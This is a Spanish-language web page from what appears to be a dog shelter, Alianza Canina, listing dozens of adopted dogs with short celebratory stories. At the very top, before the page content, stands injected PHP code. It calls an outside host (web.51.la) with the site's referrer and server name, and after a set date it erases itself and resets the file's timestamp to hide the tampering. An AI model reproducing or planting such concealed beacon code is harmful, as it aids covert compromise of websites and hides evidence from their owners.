check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Perros Adoptados

UniversoPyme

universopyme

Inscripción a boletín electrónico











Perros Adoptados PDF Imprimir E-mail

Finales Felices

TWIX. TWIX un lindo cachorrito que llegó a Alianza Canina a la edad de 2 meses aproximadamente, con un caracter divino y muy sociable con otros perros. Durante el pasado CroqueFEST en el mes de abril de 2015, una familia se enamoró de él e iniciamos el proceso de adopción. Hoy vive muy feliz y consentido en un hogar responsable, ahora se llama MONTWIX, ¡¡¡FELICIDADES!!!

TWIX_ADOPTADO


CANELO. Este hermoso cocker spaniel de 1 1/2 de edad fue abandonado por su familia y hoy tiene la oportunidad de ser feliz nuevamente y disfrutar del calor de un hogar. Mucha suerte CANELO te mereces ser muy feliz. ¡¡¡GRACIAS!!!

canelo_adoptado


VENUS y ZEUS. Estos lindos perritos tipo terrier escocés, mader e hijo, fueron abandonados por su familia. Vivieron un año en Alianza Canina y hoy son muy felices en su nuevo hogar. Gracias a su nueva familia por brindarles una oportunidad y sobre todo a los dos juntos. Estamos felices porque ya tienen un hogar responsable. Los queremos VENUS y ZEUS!!!!

VENUS_ZEUS_ADOP

MUÑECA. Esta linda perrita fue abandonada por su familia cuando se cambiaron de casa. Hoy tiene una nueva oportunidad de ser feliz con una familia responsable. Muchas gracias por abrir las puertas de su hogar a esta belleza. ¡¡¡FELICDADES MUÑECA!!!

Mueca_adoptada_1

JACK. Llegó a Alianza Canina en condiciones de desnutrición. Hoy tiene un hogar responsable y con mucho amor. Es muy juguetón y su familia está feliz. Tiene un compañero perruno con el que se lleva de maravilla. Gracias a esta linda familia por abrirle las puertas de su hogar a JACK. ¡¡¡FELICIDADES!!!

jack_adoptado


CACHI. Felices de que CACHI ya tenga un hogar responsable y lleno de amor. Muy adaptado a su nueva familia, un perro lindísmo y muy querido. Finalmente le llegó la familia ideal para él. Gracias por brindarle una oportunidad a nuestro amado CACHI. Te queremos CACHI!!!!

Cachi_adoptado

RISPA. Nuestra querida RISPA vivió por dos años en Alianza Canina. Hoy está feliz en su nuevo hogar con sus hermanos MUFFIN Y KAYLA. Felicidades RISPA!!! Te extrañamos...

Rispa_adoptada_1

POLO y LITO. Nuestros queridos POLO y LITO ya tienen un lindo hogar. Estamos felices de verlos tan tontentos en su gran jardín con su nueva hermana DANA. Gracias a su nueva familia por brindarles una nueva oportunidad. 

POLO_LITO_adoptados_1

ARCHIE. Felices de poder entregar a este hermoso perrito en adopción, casi tres años viviendo en Alianza Canina y por fin llegó el hogar ideal para él . Siempre te recordaremos ARCHIE, gracias a su nueva familia por darle una oportunidad. ¡¡¡FELICIDADES!!!

Archie_Adoptado__1


BENJI. Hermoso nuestro BENJI ya es feliz en su nueva casa. Tiene una hermana perruna que se llama MEGAN y se llevan super bien. Gracias a esta linda familia por brindarle una oportunidad después de haber sido abandonado. ¡¡¡FELICIDADES BENJI!!!

Benji_adoptado_

SWATT. Esta linda pastor belga malinois, al parecer abandonada por su anterior familia, ya tiene un hogar. Muchas felicidades a su nueva familia pero sobre todo muchas gracias por el gran compromiso que adquieren. Una raza sin duda de mucha exigencia pero igual muy nobles y muy leales. SWATT te deseamos mucha suerte en tu nuevo hogar, que sea muy feliz!!!

SWATT_adoptada_1

BIGGIE. Con inmensa alegría compartimos la noticia de la adopción de BIGGIE. Hermosa perrita con un caracter lindísimo, fue encontrada en situaición de abandono y hoy tiene una nueva oportunidad con una linda familia. Felicidades BIGGIE estamos seguros que serás muy feliz. 

Biggie_adoptada_


SILVIE. Que gusto nos da compartir la noticia de la adopción de nuestra muy querida SILVIE. Muy linda perrita tipo schnauzer que despúes de vivir poco más de 5 meses en Alianza Canina hoy está feliz en compañía de su nueva familia y su nuevo hermano perruno. Te deseamos mucha suerte SILVIE sabemos que tendrás mucho amor en tu nuevo hogar. 

SILVIE_adoptada


PECAS. Este lindo cachorrito que lo rescatamos a sus 2 1/2 meses de edad, hoy ya tiene un hogar. Gracias a una linda familia que lo ha escogido para ser el nuevo integrante de su familia. PECAS te vimos crecer y hoy te vemos partir con mucha ilusión pues sabemos que serás muy feliz. TE QUEREMOS PECAS!!!

PECAS_adoptado

TONY. Hoy este guapetón ya tiene un hogar. Despué de sufrir el abandono y vagar por las calles ahora tiene la oporunidad de estar de nuevo con una lind familia que se enamoró de él en cuanto lo vieron. Muchas gracias por darla una segunda oportunidad y les deseamos mucha suerte y que TONY sea muy feliz.

Tony_adoptado_


CHACHO. Con mucho gusto anunciamos la adopción de otro de nuestros peludos. Qué gusto entregar a nuestro querido CHACHO a esta linda familia que le brinda una nueva oportunidad. Muchas felicidades a todos, te vamos a extrañar CHACHO quien de ahora en adelante se llamará "RAYO".

chacho_adoptado


FRODO. Que felicidad nos da entregar a este pequeño a su nueva familia. FRODO ahora está con una familia que anteriormente adoptó a BOWIE con nosotros. FRODO llegó a Alianza Canina en el mes de julio después de estar más de 1 mes tratando de rescatarlo hasta que por fin se dejó. Se robó el corazón de Alianza Canina, deja un vacío muy grande pero sabemos que será muy feliz al lado de sus nuevos dueños y de sus hermanos BOWIE y CHUCHÍN. Te quermos FRODO!!!

Frodo_adoptado_1


SERENA. Esta pequeñita que es un amor hoy ya tiene un hogar. Gracias una linda familia SERENA hoy tiene una nueva oportunidad después de haber sido abandonada por sus dueños. Te deseaqmso mucho suerte y que seas muy feliz!!! TE QUEREMOS SERENA!!!

SERENA_adoptada


ZAC. Este hermoso cachorro llegó a nosotros cuando apenas tenía 1 1/2 meses de edad. Hoy tiene un hogar al lado de una linda familia que le brindará mucho amor y buenos cuidados. Gracias por adoptar a nuestro querido ZAC. Te extrañaremos guapo, que seas muy feliz!!!

ZAC_adoptado

CHIRRIS. Nuestra querida CHIRRIS hoy se llamará CARLOTA. Estamos felices de entregar a esta linda perrita a una familia que sabemos la cuidarán mucho y le brindarán mucho amor. Gracias por darle una nueva oportunidad de confiar y ser querida. Te vamos a extrañar CHIRRIS mucha suerte. Que seas muy feliz al lado de tu hermano MAX.

Chirris_adoptada

BAYLEIS. Esta linda perrita que estuvo unos meses en Alianza Canina hoy ya tiene un nuevo hogar. Muchas gracias a esta noble familia que le brinda una nueva oportunidad despúes de que BAYLEIS fue abandonada. Junto a su nuevo hermano SNOOPY esperamos que sea muy feliz. FELICIDADES BAYLEIS!!!

bayleis_adoptada_website

ALVIN. Después de vivir 1 1/2 años en Alianza Canina, hoy ALVIN por fin tienen un hogar!!! Estamos felices de que nuestro pequeño esté en una casa con una linda familia y dos hermanas perrunas DUNA y BOLITA. Sin duda ALVIN extraña a su manada de Alianza Canina pero poco a poco se está adaptando y aceptando el amor de su nueva familia. Te extrañamos ALVIN!!! 

Alvin_adoptado

BONY. Este hermoso basset hound macho de 1 año de edad aprox, llegó a Alianza Canina perdido y sus dueños nos pidieron buscar una familia responsable pues ellos ya no podían tenerlo. Afortundamente una linda familia decició adoptarlo y darle una nueva oportunidad. Hoy BONY  es feliz al lado de su nueva hermana GALA, estamos muy contentos de que ya tenga un hogar donde lo quieren y lo cuidan muy bien. Te queremos BONY!!!

Bony_adoptado

MILA y NIÑA. Qué tal estas dos lindas cachorritas adoptadas por una generosa familia!!! Muchas gracias por brindar un hogar a nuestras pequeñas. Estamos muy contentas de que ya tengan un lindo hogar donde serán muy felices. Las vamos a extrañar!!!

Mila_Nia_adoptadas_1_2


PINTA. Esta linda cachorrita que llegó a Alianza Canina a los 2 meses de edad, ya tiene un hogar!!! Estamos felices de que esté con una linda familia que estaban ansiosos por recibirla. Te deseamos mucha suerte PINTA, que seas muy feliz!!! Te extrañaremos...

PINTA_adoptada

MOLLY. Nuestra querida y consentida MOLLY ya tiene un hogar!!! Después de casi tres años de permanencia en Alianza Canina, hoy MOLLY es parte de una linda famila. Gracias a esta familia que decidió integrar a MOLLY a su familia. Tiene cinco hermanos perrunos que la recibieron de maravilla. Felicidades MOLLY!!!! Te extrañaremos...

MOLLY_adoptada_1

POLO Y ZURY. Estos lindos perritos llenaron de alegría Alianza Canina. Hoy estamos felices de que ya tienen un nuevo hogar donde los adoran. Son los mejores compañeros. Gracias famila Sempere por brindarles una familia a nuestros refugiados.

POLO_ZURY_adoptados

TAYRA. Esta linda  perrita se robó el corazón de todos en Alianza Canina, hoy tiene un hogar. Gracias a esta linda familia por brindarle esta gran oportunidad a nuesetra pequeña TAYRA. Te vamos a extrañar chiquita pero sabemos que serás muy feliz!!! 

Tayra_adoptada

ROGER y BRANDY. Más que felices de haber encontrado una nueva familia para estos lindos hermanitos de raza schnauzer. Gracias a Verónica y a su hija por recibier en su hogar a estos perritos que son sumamente cariñosos. Los extrañaremos pero sabemos que serán muy felices. 

Roger_Brandy_adoptados

BOWIE. Nuestro pequeño BOWIE ya tiene una familia!!!! Tiene un hermanito yorkie que se llama CHUCHÍN y se llevan de maravilla. Gracias a esta linda familia por brindarle una nueva oportunidad a este pequeñín. ¡FELICIDADES BOWIE!

Bowie_adoptado

NELLY. Y que NELLY se nos va con MARA y GOLDIE!!! No queremos imaginar la revolución que armarán las 3 juntas!!! Gracias familia Elizondo por la oportunidad para nuestras pequeñas. Felicidades NELLY!!!! Te vamos a extrañar!

Nelly_adoptada

MARA. Felices de poder entregar a nuestra linda MARA, llegó hace 1 año a Alianza Canina siendo una cachorrita de 2 meses de edad a lo mucho. Creció con nosotros, no conocía otra vida fuera del refugio y hoy se fue con otra de nuestras ex-refugiadas, será la compañera de GOLDIE. Muchas felicidades MARA, mucha suerte y que seas muy feliz!!!!

Mara_adoptada

TOMY. Nuestro querido TOMY ya tiene un hogar!!! Felicidades TOMY sabemos que serás muy feliz, gracias a esta linda familia por brindarte una nueva oportunidad. Te queremos y te vamos a extrañar, que seas muy feliz!!!!

Tomy_adoptado

NEGRO. Este hermoso labrador negro llegó  a Alianza Canina con heridas en sus orejas muy severas. Los atendimos de inmediato. Con muy buen caracter y muy juguetón hoy nuestro querido NEGRO ya tiene un hogar donde lo quieren y consienten mucho. Te queremos NEGRO. FELICIDADES!!!

Negro_adoptado

MORA. Nuestra querida MORA, una dulce perrita muy querida por Alianza Canina, hoy se encuentra feliz con sus nuevas hermanas LASKA y YEYU, su nueva familia la adora y nosotros super agradecidos de que la acogieran en su hogar. ¡FELICIDADES MORA!

Mora_adoptada

KELLY y GOLDIE. Estas queridas perritas que nos robaron el corazón en Alianza Canina, hoy tienen un nuevo hogar!!! Estamos más que felices de que nuestras pequeñas estén juntas con esta linda familia. Las extrañamos mucho pero sabemos que son muy felices. LAS QUEREMOS KELLY Y GOLDIE!!!!

kelly_goldie_adoptadas

RASTA. Este lindo Viejo Pastor Inglés fue rescatado en nuestro fraccionamiento. Llegó en condiciones de abandono y con cariño y muchos cuidados lo sacamos adelante. Hoy tiene un nuevo hogar con una de nuestras ex-refugiadas KALA!!! Felicidades RASTA!!!

Rasta_adoptado

ROBY. Este hermoso cachorrito cruza de jack rusell, se fue con otra ex-refugiada, TINY, ahora viven juntos y son muy felices!!! Gracias por brindarle hogar a nuestro ROBY. Te queremos ROBY!!!

Roby_adoptado

KIARA.  Esta hermosa criollita llegó a Alianza Canina y se integró rapidísimo. Muy querida por toda la familia de Alianza. Hoy es la compañera perfecta de una linda familia. Gracias por brindarle una oportunidad a nuestra KIARA de ser feliz y conocer el calor de un hogar. Te extrañamos KIARA!!!

Kiara_adoptada

NICKY- Nuestra querida NICKY hoy SISSI, ya tiene un hogar. Agradecemos a su nueva familia por brindarle la oportunidad de ser feliz y recibir mucho amor. Su nueva dueña ya le tenía preparada su camita y de inmediato se subió a ella, le encantó!. Felicidades SISSI!!! TE QUEREMOS!!!!

Nicki_home_2

CHOCO. Esta preciosa perrita cruza de pitt bull, llegó a Alianza Canina con una infección en su piel. Con amor y buenos cuidados pudimos sacarla adelante y ahora su nueva dueña está FELIZ con ella. Excelente compañía. Se adoran!!! te extrañamos CHOCO. Que seas muy feliz!!!

Choco_adoptada

MANDY. La consentida de Alianza Canina, ya tiene un nuevo hogar. Estamos felices por nuestra querida MANDY. Está de lo más feliz y sus nuevos dueños ni se diga, la adoran. Mandy es una linda pekinés que fue abandonada en nuestro fraccionamiento. Te queremos MANDY! Sabemos que estás en muy buenas manos.

Mandy_adoptada

TINY. Esta linda cachorrita llegó siendo una bebita. Tremenda y muy juguetona hoy finalmente tiene un hogar. La quieren mucho y se ha adaptado muy bien con su nueva familia.Felicidades TINY!!! Te queremos.

Tiny_adoptada

LUCKY Y LIZZIE. Con mucho gusto entregamos a estos dos lindos perritos, los consentidos de Alianza Canina. Lucky un chihuahua macho y Lizze una fox terrier que fue rescatada de maltrato. Hoy tienen un hogar donde reciben el amor que se merecen. Los extrañamos mucho!!!! Felicidades a esta linda familia que tiene dos nuevas mascotas.

Lizzie_lucky_adoptados

 

LOLA. Esta linda perrita estuvo aproximadamente 1 año en Alianza Canina. Hoy es una perrita con un hogar y una familia que la adora. Estamos felices por ti Lola, gracias a tu nueva familia, sabemos que serás muy feliz!!!!

Lola_adoptada

TYSON. Este hermoso labrador negro ya tiene un nuevo hogar. Tyson es un perro muy noble y sociable, estamos muy contentos de que esta linda familia le brinde una segunda oportunidad y pueda ser muy feliz. Te extrañamos Tyson. Te deseamos que seas muy feliz!!!!!

Tyson_adoptado


Victoria. Cuando llegó a Alianza Canina era una pequeña cachorrita, una perra muy noble y cariñosa. Hoy tiene una oportunidad de ser feliz con una familia que le brinda mucho amor. Te quermos Victoria, que seas muy feliz!!!!

victoria__-_copia

 Chispa. Nuestra querida Chispa que llegó siendo una pequeña cachorrita, ya tiene un hogar. Una familia muy linda y responsable. Chispa es feliz, tiene un hermano llamado Robin, un border collie precioso y se llevan de maravilla. Te queremos Chispa.

Adios_chispa


Rosco. Este lindo perro estuvo muy poco tiempo en Alianza Canina, gracias a la bondad de la famila Flota que se enamoró de él y decidió llevárselo para que le hiciera compañía a Nena, una preciosa labrador. Es muy feliz y se divierte mucho con su nueva hermana.

Rosco_1

 Meche. Esta linda maltesita ya tiene un hogar. Nuestra querida Meche se fue hasta Monterrey Nuevo León donde la tiene bien consentida. Gracias por darle la oportunidad de tener un lindo hogar a nuestra Meche. Hoy se llama Shasta.

Meche_MTY

 
Kala. Esta linda golden retriever llegó a Alianza Canina en muy malas condiciones. Con muchos cuidados y amor salió adelante. Hoy tiene un hogar con una familia que la adora. Te extrañamos Kala!!!

kala_2


Murci y Grisi. Los consentidos de Alianza Canina hoy tienen un hogar. Gracias a esta linda familia que les brinda un hogar con mucho amor y buenos cuidados. Los queremos Murci y Grisi!!!!

Murci_Grisi

Nuestra Foxy se fué en adopción con esta linda familia, la tienen muy consentida, duerme en su cama y está muy contenta, tiene un hermano labrador chocolate llamado Bentley.

FOXY_ADOPTADA

SKY!

Se fue en adopción con una pareja encantadora y tiene una hermanita muy parecida a el llamada Uma!

SKY_ADOPTADO

 Bip y Bop. así se llamaban un par de perritos Chihuahueños, son hermanitos,  los adoptaron juntos.

 

El Chincolo. (Chin-Colo, Sin Cola) Uno de los primeros inquilinos que tuvimos, ahora vive con dos perritas, una Schnauzer y otra criollita.

 

La Bellota. Estuvo 2 meses en el refugio. Aunque era una Pitt Bull era totalmente inofensiva, se fue con una familia que tenía un Chihuahueño.

 

La Chinita. Muy tranquilita Schnauzer. La adoptaron y tiene un hermanito.

 

Manny. Cruza de labrador. Lo encontramos en el Centro Comercial. Lo adoptó una muy buena amiga.

 

Cleo. Criollita, una perra muy inteligente. Adoptada por una familia con un jardín muy grande. Es muy feliz.

 

Caramelo.Criollito.Lo encontramos debajo de un coche, estaba lloviendo. Lo adoptaron muy rápido y es feliz con su nueva familia.

   AYUDENOS A ENCONTRARLO, SE SALIO Y NO HA APARECIDO POR FAVOR

Chico. Pastor Alemán. Estaba vagando por la calle, lo rescatamos y lo adoptaron rápidamente.

 

Dolly. Boxer. Adoptada por una familia muy amorosa.

 

Chino. Airedale Terrier. Estaba vagando por las calles del fraccionamiento. Fue adoptado y vive en México, viene a Cocoyoc todos los fines de semana y nos visita en el refugio. ¡Está divino!

 

El Güerito Chihuahueño. Adoptado y vive como rey. Tiene una nueva hermanita, también Chihuahua. Estuvo con nosotros aproximadamente un mes y medio.

 

El Gusano. French Poddle negro. Adoptado y se fue hasta la ciudad de México. Lo quieren mucho.

      VUELVE POR FAVOR GUSANITO!! SE PERDIO EN MEXICO  

Pantufla. Fue adoptada y tiene dos hermanitos French Poddle. Cruza de Labrador.

 

Mini y Hanna. Criollita y cruza de Boxer. Están en un lugar con 3 hectáreas para disfrutar. Son muy felices y las cuidan muy bien.

 

Baby. Cruza de Labrador. Vive en una Finca enorme con otra Labrador. Es muy querida y está feliz.

 

Vivi. Fox Terrier pelo de alambre. Felizmente adoptada, sus dueños viajan mucho y la llevan con ellos a todas partes. Es una perra que sufrió mucho con sus dueños anteriores, pero ahora finalmente tiene una familia que la adora y la cuida muy bien.

 

Chiquis. French Poddle. Adoptada, vive con otro French Poddle. Es muy feliz.

 

Bruno y Susana. Cruza de labrador y criollita. Adoptados juntos como hermanos. Sus nuevos dueños sólo adoptarían a Bruno, pero al ver lo mucho que Susana y él se quieren, decidieron llevarse a Susana también. Son muy felices y tienen un jardín muy grande para jugar.

 RIP BRUNO :-(

Yenna. Criollita, la adoptó una familia que la quiere mucho y la cuidan.

 

Cuja. Mamá e hijos, se fueron todos juntos con una familia que los quiere mucho. Fueron rescatados en la calle, estaban en muy malas condiciones. Hoy son felices.

 

Cujito y Timón. Están ahora muy felices en su nuevo hogar.

 

 Leah. Adoptada tiene muchos hermanitos y recibo mucho amor.

 leah_WinCE

Flash. Se fue a Querétaro y vive con una perrita French Poodle. Un perro muy querido  

flash_WinCE

Shary. Adoptada vive con unos niños lindos que la adoran y tiene como hermano un Beagle.

shari

 

Teddy. Un perro lindisimo, adoptado por una familia que lo adora, vive como rey.

teddy1_WinCE

 

Max. Se fue con una familia que lo quiere mucho. Un perro muy inteligente.

 max_WinCE

 

Oso. Un perro hermoso. Cuando llegó al refugio estaba pequeñito y parecía un osezno, de ahí su nombre. Muy tierno y muy juguetón. Lo adoptó una familia que lo quiere mucho y está muy contento.

Oso_1

 Lobo. ¡Un perro impactante! Muy juguetón y siempre quería estar con la gente. Muy inquieto, pero su  nuevo dueño poco a poco aprendió a tranquilizarlo. Ahora tiene 5 hermanos perrunos.

 lobo_1

 Bella. Linda perrita! tiernísima, le encantaba que le rascaramos la panza. Se fue con una familia al Distrito Federal!

 bella

Maya!! Felizmente adoptada, aunque su nueva hermana no está muy contenta

Maya_

 Hash. Muy feliz se fue Hash con su nueva familia. Sin duda alguna una integrante que deja un lugar importante en Alianza Canina. Te deseamos mucha suerte Hash. 

Familia_y_hash

Darko. Darko se fue con una familia que lo quiere mucho y lo sacan a pasear todos los días. Es un perro muy inteligente y sus dueños están muy contentos con él. Suerte Darko!

Darko_

 Tory. Tory es un perro que fue abandonado por sus dueños. Afortunadamente lo rescatamos de la calle y le dimos mucho amor en Alianza Canina. Hoy es feliz con sus nuevos dueños quienes lo adoran. Felicidades Tory. Te vamos a extrañar.

Tory__003

 Coca. Coca fue encontrada en condiciones de total abandono. La sacamos adelante en Alianza Canina y hoy vive feliz con su nuevo dueño. Te queremos Coca.

coca_004

 Ronnie. Ronnie fue econtrado vagando por las calles del fraccionamiento. Traía collar. Pasó el tiempo y jamás nadie lo reclamó. Este precioso cachorro tuvo la suerte de que una familia se enamorara de él y lo adoptaran. Hoy vive feliz, se llama Tobías y tiene un hermanito Pug y una hermanita Fox Terrier.

GIGANTE_RONNIE_012 RIP RONNIE :-(

 Sasha, Tara y Shaki. Estas tres lindas cachorritas se encontraron abandonas dentro del fraccionamiento. Con menos de 1 1/2 mes de edad llegaron a Alianza Canina. Una linda familia decidió adoptar a las 3 juntas. Les deseamos mucha suerte.

Tara_Sasha_Shaki_016

 Bambie. Nuestro pequeño Bambie ya tiene un hogar!!! Estamos felices de haber encontrado una familia que sabemos que lo ciudará y le dará mucho amor. Ahora tiene un hermano canino de raza cocker spaniel que se llama Junior, los dos se llevan de maravilla. ¡FELICIDADES BAMBIE! Te vamos a extrañar!!!

bambie_jr RIP BAMBIE :-(

Tigger. Un precioso Mastín Napolitano rescatado de maltrato y abandono. Hoy tiene un nuevo hogar donde estamos seguros será muy feliz y tendrá una vida digna. Ahora tiene una hermana Bull Mastiff llamada "Niurka", se llevaron de maravilla. Gracias Sr. Ignacio Galicia por ofrecerle un hogar a Tigger. ¡FELICIADES!

Tigger_adoptado_029

 

 

 

Última actualización el Domingo, 10 de Julio de 2016 19:02
 

Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete0_cerocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus